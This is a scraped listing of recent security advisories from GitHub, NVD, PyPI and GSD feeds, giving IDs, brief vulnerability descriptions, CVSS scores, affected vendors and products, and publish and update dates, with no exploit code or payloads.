Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
ghsa-3grp-7h7h-xcr6 (github) Authorization Bypass Through User-Controlled Key, CWE - 862 - Missing Authorization, – Improper A... 2025-09-19T15:31:09Z 2025-09-30T15:30:28Z
ghsa-8h48-6654-j9p6 (github) Zohocorp ManageEngine Applications Manager versions 176600 and prior are vulnerable to stored cro... 2025-07-23T12:30:25Z 2025-09-30T15:30:27Z
ghsa-w8qp-5q95-q255 (github) A CWE-754 ? Improper Check for Unusual or Exceptional Conditions vulnerability exists in Magelis ... 2022-05-24T16:56:25Z 2025-09-30T15:30:26Z
ghsa-qrg2-552m-g38p (github) The Treck TCP/IP stack before 6.0.1.66 has an ICMPv4 Out-of-bounds Read. 2022-05-24T17:20:45Z 2025-09-30T15:30:26Z
ghsa-f526-vg2h-46f3 (github) A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0. It ha... 2024-03-22T00:31:14Z 2025-09-30T15:30:26Z
ghsa-53cj-vhvg-mmqf (github) An issue was discovered in Treck IPv6 before 6.0.1.68. Improper input validation in the IPv6 comp... 2022-05-24T17:37:05Z 2025-09-30T15:30:26Z
ghsa-3wmc-fg6p-fq4v (github) The Treck TCP/IP stack before 6.0.1.66 has an Integer Overflow during Memory Allocation that caus... 2022-05-24T17:20:44Z 2025-09-30T15:30:26Z
ghsa-prj3-ccx8-p6x4 (github) Netty affected by MadeYouReset HTTP/2 DDoS vulnerability 2025-08-13T19:06:56Z 2025-09-30T15:24:23Z
ghsa-w64r-2g3w-w8w4 (github) Coder AgentAPI exposed user chat history via a DNS rebinding attack 2025-09-29T20:40:26Z 2025-09-30T15:16:20Z
ghsa-g99p-47x7-mq88 (github) go-f3 module vulnerable to integer overflow leading to panic 2025-09-29T20:40:08Z 2025-09-30T15:16:09Z
ghsa-7pq9-rf9p-wcrf (github) go-f3 Vulnerable to Cached Justification Verification Bypass 2025-09-29T20:40:02Z 2025-09-30T15:16:03Z
ghsa-v39m-5m9j-m9w9 (github) mkdocs-include-markdown-plugin susceptible to unvalidated input colliding with substitution placeholders 2025-09-29T16:29:07Z 2025-09-30T15:15:20Z
ghsa-wpwj-69cm-q9c5 (github) go-mail has insufficient address encoding when passing mail addresses to the SMTP client 2025-09-29T16:28:58Z 2025-09-30T15:15:13Z
ghsa-6q9c-m9fr-865m (github) vet MCP Server SSE Transport DNS Rebinding Vulnerability 2025-09-29T16:28:49Z 2025-09-30T15:15:06Z
ghsa-h7rh-xfpj-hpcm (github) MinIO Java Client XML Tag Value Substitution Vulnerability 2025-09-29T17:53:31Z 2025-09-30T15:14:27Z
ghsa-vqfh-5rpf-pw2x (github) The Chat by Chatwee plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versi... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-mjmg-pjmq-g329 (github) The AffiliateWP plugin for WordPress is vulnerable to SQL Injection via the ajax_get_affiliate_id... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-h5cc-59xq-vwf6 (github) The LockerPress – WordPress Security Plugin plugin for WordPress is vulnerable to Cross-Site Requ... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-ff8r-v524-64q2 (github) The Tiny Bootstrap Elements Light plugin for WordPress is vulnerable to Local File Inclusion in a... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-5xgr-pv6r-3wh3 (github) The Yoga Schedule Momoyoga plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-42x6-84fc-386q (github) The Post By Email plugin for WordPress is vulnerable to arbitrary file uploads due to missing fil... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-38r4-7v7q-xjh5 (github) The Bei Fen – WordPress Backup Plugin plugin for WordPress is vulnerable to Local File Inclusion ... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-xrx7-7p6r-q95g (github) The LatePoint plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up... 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-xphg-w288-5vjw (github) PAD CMS implements weak client-side brute-force protection by utilizing two cookies:  login_count... 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-x8gc-2rvv-f7m2 (github) Rejected reason: Not used 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-wxv4-h2hm-q482 (github) Rejected reason: Not used 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-wrw5-6664-q27v (github) The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulne... 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-v536-8hrh-rxx4 (github) The Copypress Rest API plugin for WordPress is vulnerable to Remote Code Execution via copyreap_h... 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-r9r9-8rf7-6x84 (github) The All in One Music Player plugin for WordPress is vulnerable to Path Traversal in all versions ... 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-r4q2-rhhv-jwfm (github) The WeedMaps Menu for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting... 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Base Score Description Vendor Product Publish Date Update Date
cve-2020-27336 (NVD) An issue was discovered in Treck IPv6 before 6.0.1.68. Improper input validation in the IPv6 component when handling a packet sent by an unauthenticated remote attacker could result in an out-of-bounds read of up to three bytes via network access. n/a
 n/a
 2020-12-22T21:04:08.000Z 2025-09-30T15:52:30.900Z
cve-2020-11909 (NVD) N/A The Treck TCP/IP stack before 6.0.1.66 has an IPv4 Integer Underflow. n/a
 n/a
 2020-06-17T10:51:09.000Z 2025-09-30T15:52:16.737Z
cve-2025-57852 (NVD) CVSS-v3.1: 5.2 Openshift-ai: privilege escalation via excessive /etc/passwd permissions Red Hat
Red Hat
 Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
 2025-09-30T14:37:10.024Z 2025-09-30T15:52:02.044Z
cve-2020-27337 (NVD) An issue was discovered in Treck IPv6 before 6.0.1.68. Improper Input Validation in the IPv6 component allows an unauthenticated remote attacker to cause an Out of Bounds Write, and possibly a Denial of Service via network access. n/a
 n/a
 2020-12-22T21:04:11.000Z 2025-09-30T15:50:10.920Z
cve-2020-11910 (NVD) N/A The Treck TCP/IP stack before 6.0.1.66 has an ICMPv4 Out-of-bounds Read. n/a
 n/a
 2020-06-17T10:52:48.000Z 2025-09-30T15:49:44.342Z
cve-2025-59668 (NVD) CVSS-v3.0: 7.5 CVSS-v4.0: 8.7 Multiple versions of Central Monitor CNS-6201 contain a NULL pointer dereference vulnerability. When processing a crafted certain UDP packet, the affected device may abnormally terminate. NIHON KOHDEN CORPORATION
 Central Monitor CNS-6201
 2025-09-30T04:06:11.279Z 2025-09-30T15:46:39.862Z
cve-2025-1396 (NVD) CVSS-v3.1: 3.7 Username Enumeration in Multiple WSO2 Products with Multi-Attribute Login Enabled WSO2
WSO2
WSO2
 WSO2 Identity Server
WSO2 Open Banking IAM
WSO2 Identity Server as Key Manager
 2025-09-26T07:52:52.297Z 2025-09-30T15:43:31.106Z
cve-2025-59011 (NVD) CVSS-v3.1: 7.5 WordPress Traveler Theme < 3.2.3 - Arbitrary Content Deletion Vulnerability shinetheme
 Traveler
 2025-09-26T08:31:07.930Z 2025-09-30T15:43:13.815Z
cve-2025-56572 (NVD) N/A An issue in finance.js v.4.1.0 allows a remote attacker to cause a denial of service via the seekZero() parameter. n/a
 n/a
 2025-09-30T00:00:00.000Z 2025-09-30T15:43:03.728Z
cve-2025-59010 (NVD) CVSS-v3.1: 7.5 WordPress Permalink Manager Lite Plugin <= 2.5.1.3 - Sensitive Data Exposure Vulnerability Maciej Bis
 Permalink Manager Lite
 2025-09-26T08:31:08.621Z 2025-09-30T15:42:54.069Z
cve-2025-41245 (NVD) CVSS-v3.1: 4.9 VMSA-2025-0015: VMware Aria Operations and VMware Tools updates address multiple vulnerabilities (CVE-2025-41244,CVE-2025-41245, CVE-2025-41246) VMware
VMware
VMware
VMware
 VMware Aria Operations
VMware Cloud Foundation
VMware Telco Cloud Platform
VMware Telco Cloud Infrastructure
 2025-09-29T16:19:15.836Z 2025-09-30T15:42:32.121Z
cve-2025-56571 (NVD) N/A Finance.js v4.1.0 contains a Denial of Service (DoS) vulnerability via the IRR function’s depth parameter. Improper handling of the recursion/iteration limit can lead to excessive CPU usage, causing application stalls or crashes. n/a
 n/a
 2025-09-30T00:00:00.000Z 2025-09-30T15:42:18.355Z
cve-2025-11163 (NVD) SmartCrawl SEO checker, analyzer & optimizer <= 3.14.3 - Missing Authorization to Plugin Settings Update wpmudev
 SmartCrawl SEO checker, analyzer & optimizer
 2025-09-30T05:28:53.152Z 2025-09-30T15:41:18.658Z
cve-2025-7052 (NVD) LatePoint <= 5.1.94 - Cross-Site Request Forgery to Account Takeover via change_password() Function latepoint
 LatePoint – Calendar Booking Plugin for Appointments and Events
 2025-09-30T04:27:07.926Z 2025-09-30T15:40:47.928Z
cve-2025-56018 (NVD) N/A SourceCodester Web-based Pharmacy Product Management System V1.0 is vulnerable to Cross Site Scripting (XSS) in Category Management via the category name field. n/a
 n/a
 2025-09-30T00:00:00.000Z 2025-09-30T15:40:40.026Z
cve-2025-7038 (NVD) LatePoint <= 5.1.94 - Unauthenticated Authentication Bypass via load_step Function latepoint
 LatePoint – Calendar Booking Plugin for Appointments and Events
 2025-09-30T04:27:07.535Z 2025-09-30T15:40:19.475Z
cve-2025-6941 (NVD) LatePoint <= 5.1.94 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode latepoint
 LatePoint – Calendar Booking Plugin for Appointments and Events
 2025-09-30T04:27:07.055Z 2025-09-30T15:39:46.996Z
cve-2025-6815 (NVD) LatePoint <= 5.1.94 - Authenticated (Administrator+) Stored Cross-Site Scripting latepoint
 LatePoint – Calendar Booking Plugin for Appointments and Events
 2025-09-30T04:27:06.415Z 2025-09-30T15:39:14.032Z
cve-2025-8777 (NVD) planetcalc <= 2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via language Parameter planetcalc
 planetcalc
 2025-09-30T03:35:34.141Z 2025-09-30T15:38:26.743Z
cve-2025-10128 (NVD) Eulerpool Research Systems <= 4.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting michaellow
 Eulerpool Research Systems
 2025-09-30T03:35:32.618Z 2025-09-30T15:37:41.439Z
cve-2025-8608 (NVD) Mihdan: Elementor Yandex Maps <= 1.6.11 - Authenticated (Contributor+) Stored Cross-Site Scripting via Marker Pins mihdan
 Mihdan: Elementor Yandex Maps
 2025-09-30T03:35:32.244Z 2025-09-30T15:36:49.865Z
cve-2025-10189 (NVD) BP Direct Menus <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting mrwulf
 BP Direct Menus
 2025-09-30T03:35:31.851Z 2025-09-30T15:36:06.187Z
cve-2025-9991 (NVD) Tiny Bootstrap Elements Light <= 4.3.34 - Unauthenticated Local File Inclusion migli
 Tiny Bootstrap Elements Light
 2025-09-30T03:35:31.476Z 2025-09-30T15:35:21.042Z
cve-2025-11178 (NVD) CVSS-v3.0: 7.3 Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis True Image (Windows) before build 42386. Acronis
 Acronis True Image
 2025-09-30T14:52:20.711Z 2025-09-30T15:34:57.863Z
cve-2025-7779 (NVD) CVSS-v3.0: 8.8 Local privilege escalation due to insecure XPC service configuration. The following products are affected: Acronis True Image (macOS) before build 42389, Acronis True Image for SanDisk (macOS) before build 42198, Acronis True Image for Western Digital (macOS) before build 42197. Acronis
Acronis
Acronis
 Acronis True Image
Acronis True Image for SanDisk
Acronis True Image for Western Digital
 2025-09-30T14:52:46.494Z 2025-09-30T15:34:50.728Z
cve-2025-10168 (NVD) Any News Ticker <= 3.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting mucasoft
 Any News Ticker
 2025-09-30T03:35:31.054Z 2025-09-30T15:33:06.448Z
cve-2025-9948 (NVD) Chat by Chatwee <= 2.1.3 - Cross-Site Request Forgery to Settings Update paulq
 Chat by Chatwee
 2025-09-30T03:35:30.655Z 2025-09-30T15:32:03.468Z
cve-2025-10182 (NVD) dbview <= 0.5.5 - Authenticated (Contributor+) Stored Cross-Site Scripting john-ackers
 dbview
 2025-09-30T03:35:30.092Z 2025-09-30T15:31:35.693Z
cve-2025-8559 (NVD) All in One Music Player <= 1.3.1 - Authenticated (Contributor+) Path Traversal via theme Parameter sanzeeb3
 All in One Music Player
 2025-09-30T03:35:29.725Z 2025-09-30T15:30:55.175Z
cve-2025-56676 (NVD) N/A TitanSystems Zender v3.9.7 contains an account takeover vulnerability in its password reset functionality. A temporary password or reset token issued to one user can be used to log in as another user, due to improper validation of token-user linkage. This allows remote attackers to gain unauthorized access to any user account by exploiting the password reset mechanism. The vulnerability occurs because the reset token is not correctly bound to the requesting account and is accepted for other user emails during login, enabling privilege escalation and information disclosure. n/a
 n/a
 2025-09-30T00:00:00.000Z 2025-09-30T15:30:54.381Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Base Score Description Vendor Product Publish Date Update Date
cve-2024-36024 (NVD) N/A drm/amd/display: Disable idle reallow as part of command/gpint execution Linux
Linux
 Linux
Linux
 2024-05-30T15:04:01.114Z 2025-07-11T17:19:43.927Z
cve-2024-36021 (NVD) N/A net: hns3: fix kernel crash when devlink reload during pf initialization Linux
Linux
 Linux
Linux
 2024-05-30T14:59:45.757Z 2025-05-04T09:10:44.480Z
cve-2025-7493 (NVD) CVSS-v3.1: 9.1 Freeipa: idm: privilege escalation from host to domain admin in freeipa Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
 Red Hat Enterprise Linux 10
Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions
Red Hat Enterprise Linux 9.4 Extended Update Support
Red Hat Enterprise Linux 6
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
 2025-09-30T15:06:46.836Z 2025-09-30T17:01:36.196Z
cve-2025-56520 (NVD) N/A Dify v1.6.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component controllers.console.remote_files.RemoteFileUploadApi. A different vulnerability than CVE-2025-29720. n/a
 n/a
 2025-09-30T00:00:00.000Z 2025-09-30T17:07:19.135Z
cve-2025-56207 (NVD) N/A A security flaw in the '_transfer' function of a smart contract implementation for Money Making Opportunity (MMO), an Ethereum ERC721 Non-Fungible Token (NFT) project, allows users or attackers to transfer NFTs to the zero address, leading to permanent asset loss and non-compliance with the ERC721 standard. The eth address is 0x41d3d86a84c8507a7bc14f2491ec4d188fa944e7, contract name is MoneyMakingOpportunity, and compiler version is v0.8.17+commit.8df45f5f. n/a
 n/a
 2025-09-30T00:00:00.000Z 2025-09-30T16:41:21.327Z
cve-2025-54476 (NVD) CVSS-v4.0: 4.8 Joomla! Core - [20250901] Inadequate content filtering within the checkAttribute filter code Joomla! Project
 Joomla! CMS
 2025-09-30T16:02:38.757Z 2025-09-30T17:12:24.696Z
cve-2024-36018 (NVD) N/A nouveau/uvmm: fix addr/range calcs for remap operations Linux
Linux
 Linux
Linux
 2024-05-30T14:59:42.091Z 2025-05-04T09:10:41.008Z
cve-2025-20352 (NVD) A vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow the following: An authenticated, remote attacker with low privileges could cause a denial of service (DoS) condition on an affected device that is running Cisco IOS Software or Cisco IOS XE Software. To cause the DoS, the attacker must have the SNMPv2c or earlier read-only community string or valid SNMPv3 user credentials. An authenticated, remote attacker with high privileges could execute code as the root user on an affected device that is running Cisco IOS XE Software. To execute code as the root user, the attacker must have the SNMPv1 or v2c read-only community string or valid SNMPv3 user credentials and administrative or privilege 15 credentials on the affected device. An attacker could exploit this vulnerability by sending a crafted SNMP packet to an affected device over IPv4 or IPv6 networks. This vulnerability is due to a stack overflow condition in the SNMP subsystem of the affected software. A successful exploit could allow a low-privileged attacker to cause the affected system to reload, resulting in a DoS condition, or allow a high-privileged attacker to execute arbitrary code as the root user and obtain full control of the affected system. Note: This vulnerability affects all versions of SNMP. Cisco
Cisco
Cisco
 IOS
Cisco IOS XE Software
Cisco IOS XE Catalyst SD-WAN
 2025-09-24T17:10:42.891Z 2025-09-30T16:18:05.082Z
cve-2025-43400 (NVD) N/A An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Sonoma 14.8.1, macOS Tahoe 26.0.1, macOS Sequoia 15.7.1, visionOS 26.0.1, iOS 26.0.1 and iPadOS 26.0.1, iOS 18.7.1 and iPadOS 18.7.1. Processing a maliciously crafted font may lead to unexpected app termination or corrupt process memory. Apple
Apple
Apple
Apple
Apple
Apple
 macOS
macOS
visionOS
iOS and iPadOS
macOS
iOS and iPadOS
 2025-09-29T18:03:35.300Z 2025-09-29T18:49:22.368Z
cve-2024-10241 (NVD) CVSS-v3.1: 4.3 Private channel names leaked with Ctrl+K when ElasticSearch is enabled Mattermost
 Mattermost
 2024-10-29T08:08:20.873Z 2024-10-29T12:52:53.569Z
cve-2025-23798 (NVD) CVSS-v3.1: 7.1 WordPress Mass Messaging in BuddyPress Plugin <= 2.2.1 - Reflected Cross Site Scripting (XSS) vulnerability Eliott Robson
 Mass Messaging in BuddyPress
 2025-01-22T14:29:22.024Z 2025-08-26T19:35:18.699Z
cve-2025-26876 (NVD) CVSS-v3.1: 6.8 WordPress Search with Typesense Plugin <= 2.0.8 - Path Traversal vulnerability CodeManas
 Search with Typesense
 2025-02-25T14:17:51.077Z 2025-08-26T19:33:58.109Z
cve-2025-26877 (NVD) CVSS-v3.1: 6.5 WordPress Front End Users Plugin <= 3.2.30 - Cross Site Scripting (XSS) vulnerability Rustaurius
 Front End Users
 2025-02-25T14:17:51.241Z 2025-08-26T19:32:51.029Z
cve-2025-28168 (NVD) The Multiple File Upload add-on component 3.1.0 for OutSystems is vulnerable to Unrestricted File Upload. This occurs because file extension and size validations are enforced solely on the client side. An attacker can intercept the upload request and modify a parameter to bypass extension restrictions and upload arbitrary files. NOTE: this is a third-party component that is not supplied or supported by OutSystems. Multi Uploaders
 Multiple File Upload
 2025-05-05T00:00:00.000Z 2025-08-26T19:27:57.951Z
cve-2025-29088 (NVD) In SQLite 3.49.0 before 3.49.1, certain argument values to sqlite3_db_config (in the C-language API) can cause a denial of service (application crash). An sz*nBig multiplication is not cast to a 64-bit integer, and consequently some memory allocations may be incorrect. SQLite
 SQLite
 2025-04-10T00:00:00.000Z 2025-08-26T19:27:20.720Z
cve-2024-1587 (NVD) The Newsmatic theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.0 via the 'newsmatic_filter_posts_load_tab_content'. This makes it possible for unauthenticated attackers to view draft posts and post content. blazethemes
 Newsmatic
 2024-04-09T18:59:18.626Z 2025-08-26T20:08:09.716Z
cve-2024-1714 (NVD) CVSS-v3.1: 7.1 Access Request for Entitlement Values with Leading/Trailing Whitespace SailPoint
 IdentityIQ
 2024-02-21T16:57:19.298Z 2025-08-26T20:08:09.865Z
cve-2024-20332 (NVD) A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct a server-side request forgery (SSRF) attack through an affected device. This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device. To successfully exploit this vulnerability, the attacker would need valid Super Admin credentials. Cisco
 Cisco Identity Services Engine Software
 2024-04-03T16:22:02.111Z 2025-08-26T20:08:10.020Z
cve-2024-20345 (NVD) A vulnerability in the file upload functionality of Cisco AppDynamics Controller could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to access sensitive data on an affected device. Cisco
 Cisco AppDynamics
 2024-03-06T16:33:48.826Z 2025-08-26T20:08:10.239Z
cve-2024-23968 (NVD) CVSS-v3.1: 8.8 ChargePoint Home Flex SrvrToSmSetAutoChnlListMsg Stack-based Buffer Overflow ChargePoint
 Home Flex
 2025-01-30T23:31:40.396Z 2025-08-26T21:01:52.095Z
cve-2024-23969 (NVD) CVSS-v3.1: 8.8 ChargePoint Home Flex wlanchnllst Out-Of-Bounds Write ChargePoint
 Home Flex
 2025-01-30T23:37:22.462Z 2025-08-26T21:02:16.174Z
cve-2024-23970 (NVD) CVSS-v3.1: 6.5 ChargePoint Home Flex Improper Certificate Validation ChargePoint
 Home Flex
 2025-01-30T23:40:49.963Z 2025-08-26T21:02:52.773Z
cve-2024-23971 (NVD) CVSS-v3.1: 8.8 ChargePoint Home Flex OCPP bswitch Command Injection ChargePoint
 Home Flex
 2025-01-30T23:42:57.796Z 2025-08-26T21:08:23.253Z
cve-2024-23973 (NVD) CVSS-v3.1: 8.8 Silicon Labs Gecko OS HTTP GET Request Handling Stack-based Buffer Overflow Silicon Labs
 Gecko OS
 2025-01-30T23:28:55.542Z 2025-08-26T21:08:23.396Z
cve-2025-5062 (NVD) WooCommerce <= 9.4.2 - PostMessage-Based Cross-Site Scripting automattic
 WooCommerce
 2025-05-22T03:42:08.044Z 2025-05-22T13:31:43.045Z
cve-2024-9082 (NVD) SourceCodester Online Eyewear Shop User Creation Users.php improper authorization SourceCodester
 Online Eyewear Shop
 2024-09-22T08:00:07.660Z 2025-03-31T05:47:57.208Z
cve-2024-10559 (NVD) SourceCodester Airport Booking Management System details buffer overflow SourceCodester
 Airport Booking Management System
 2024-10-31T02:00:14.095Z 2025-04-03T10:54:25.610Z
cve-2024-1833 (NVD) SourceCodester Employee Management System login.php sql injection SourceCodester
 Employee Management System
 2024-02-23T19:31:06.771Z 2025-04-05T06:19:45.237Z
cve-2025-6034 (NVD) CVSS-v3.1: 7.8 CVSS-v4.0: 8.5 Out of Bounds Read in DefaultFontOptions() in NI Circuit Design Suite NI
 Circuit Design Suite
 2025-09-30T16:07:21.551Z 2025-09-30T17:09:26.111Z
cve-2025-6033 (NVD) CVSS-v3.1: 7.8 CVSS-v4.0: 8.5 Memory Corruption issue in XML_Serialize() in NI Circuit Design Suite NI
 Circuit Design Suite
 2025-09-30T16:05:53.142Z 2025-09-30T17:10:52.906Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
pysec-2025-34 The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_c... 2025-04-24T01:15:49+00:00 2025-04-24T03:08:15.436691+00:00
pysec-2025-33 Vyper is a Pythonic Smart Contract Language for the EVM. When the Vyper Compiler uses the precomp... 2025-01-14T18:16:05+00:00 2025-04-23T21:23:01.322686+00:00
pysec-2025-32 BentoML is a Python library for building online serving systems optimized for AI apps and model i... 2025-04-09T16:15:25+00:00 2025-04-22T19:21:34.073355+00:00
pysec-2025-31 vyper is a Pythonic Smart Contract Language for the EVM. Vyper handles AugAssign statements by fi... 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.116292+00:00
pysec-2025-30 vyper is a Pythonic Smart Contract Language for the EVM. Multiple evaluation of a single expressi... 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.064106+00:00
pysec-2025-29 vyper is a Pythonic Smart Contract Language for the EVM. Vyper `sqrt()` builtin uses the babyloni... 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.005382+00:00
pysec-2025-28 The Snowflake Connector for Python provides an interface for developing Python applications that ... 2025-01-29T21:15:21+00:00 2025-04-09T17:27:27.772920+00:00
pysec-2025-27 The Snowflake Connector for Python provides an interface for developing Python applications that ... 2025-01-29T21:15:21+00:00 2025-04-09T17:27:27.711157+00:00
pysec-2025-26 The Snowflake Connector for Python provides an interface for developing Python applications that ... 2025-01-29T21:15:21+00:00 2025-04-09T17:27:27.645758+00:00
pysec-2021-891 CWE - CWE-287: Improper Authentication vulnerability in SUSE Linux Enterprise Server 15 SP 3; ope... 2021-03-03T10:15:13+00:00 2025-04-09T17:27:27.582884+00:00
pysec-2025-25 Rembg is a tool to remove images background. In Rembg 2.0.57 and earlier, the CORS middleware is ... 2025-03-03T17:15:14+00:00 2025-04-09T17:27:27.532849+00:00
pysec-2025-24 Rembg is a tool to remove images background. In Rembg 2.0.57 and earlier, the /api/remove endpoin... 2025-03-03T17:15:14+00:00 2025-04-09T17:27:27.486485+00:00
pysec-2025-23 Versions of the package ray before 2.43.0 are vulnerable to Insertion of Sensitive Information in... 2025-03-06T05:15:16+00:00 2025-04-09T17:27:27.434099+00:00
pysec-2022-43179 Poetry is a dependency manager for Python. To handle dependencies that come from a Git repository... 2022-09-07T19:15:08+00:00 2025-04-09T17:27:27.255151+00:00
pysec-2025-22 A vulnerability, that could result in Remote Code Execution (RCE), has been found in PlotAI. Lack... 2025-03-10T14:15:24+00:00 2025-04-09T17:27:27.203714+00:00
pysec-2023-311 plone.namedfile allows users to handle `File` and `Image` fields targeting, but not depending on,... 2023-09-21T15:15:10+00:00 2025-04-09T17:27:27.153848+00:00
pysec-2025-21 picklescan before 0.0.23 fails to detect malicious pickle files inside PyTorch model archives whe... 2025-03-10T12:15:12+00:00 2025-04-09T17:27:27.016747+00:00
pysec-2025-20 picklescan before 0.0.23 is vulnerable to a ZIP archive manipulation attack that causes it to cra... 2025-03-10T12:15:10+00:00 2025-04-09T17:27:26.966215+00:00
pysec-2025-19 picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vuln... 2025-03-03T19:15:34+00:00 2025-04-09T17:27:26.916350+00:00
pysec-2025-18 picklescan before 0.0.21 does not treat 'pip' as an unsafe global. An attacker could craft a mali... 2025-02-26T15:15:24+00:00 2025-04-09T17:27:26.867210+00:00
pysec-2023-310 Mobile Security Framework (MobSF) <=v3.7.8 Beta is vulnerable to Insecure Permissions. NOTE: the ... 2023-09-21T22:15:11+00:00 2025-04-09T17:27:26.663665+00:00
pysec-2025-17 In mlflow/mlflow version 2.18, an admin is able to create a new user account without setting a pa... 2025-03-20T10:15:54+00:00 2025-04-09T17:27:26.322333+00:00
pysec-2023-309 Path Traversal in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-13T00:15:07+00:00 2025-04-09T17:27:26.271200+00:00
pysec-2023-308 Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0. 2023-07-19T01:15:10+00:00 2025-04-09T17:27:26.223213+00:00
pysec-2025-16 LNbits is a Lightning wallet and accounts system. A Server-Side Request Forgery (SSRF) vulnerabil... 2025-04-06T20:15:15+00:00 2025-04-09T17:27:25.872691+00:00
pysec-2025-15 Flask-AppBuilder is an application development framework. Prior to 4.5.3, Flask-AppBuilder allows... 2025-03-03T16:15:41+00:00 2025-04-09T17:27:25.227116+00:00
pysec-2025-14 An issue was discovered in Django 5.1 before 5.1.8 and 5.0 before 5.0.14. The NFKC normalization ... 2025-04-02T13:15:44+00:00 2025-04-09T17:27:25.169049+00:00
pysec-2025-13 An issue was discovered in Django 5.1 before 5.1.7, 5.0 before 5.0.13, and 4.2 before 4.2.20. The... 2025-03-06T19:15:27+00:00 2025-04-09T17:27:25.095679+00:00
pysec-2022-43178 An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the cleo PyPI pac... 2022-11-09T20:15:10+00:00 2025-04-09T17:27:24.793038+00:00
pysec-2022-43177 Azure CLI is the command-line interface for Microsoft Azure. In versions previous to 2.40.0, Azur... 2022-10-25T17:15:56+00:00 2025-04-09T17:27:24.642962+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-33851 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33850 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33849 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4295 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4294 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4293 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4292 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4291 The format of the source doesn't require a description, click on the link for more details
gsd-2023-52722 The format of the source doesn't require a description, click on the link for more details
gsd-2022-48685 The format of the source doesn't require a description, click on the link for more details
gsd-2022-48684 The format of the source doesn't require a description, click on the link for more details
gsd-2024-24777 The format of the source doesn't require a description, click on the link for more details
gsd-2024-28875 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33846 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33845 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33844 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33843 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33842 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33841 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33840 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33839 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33838 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33837 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33836 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33835 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33834 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33833 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33832 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33831 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33830 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
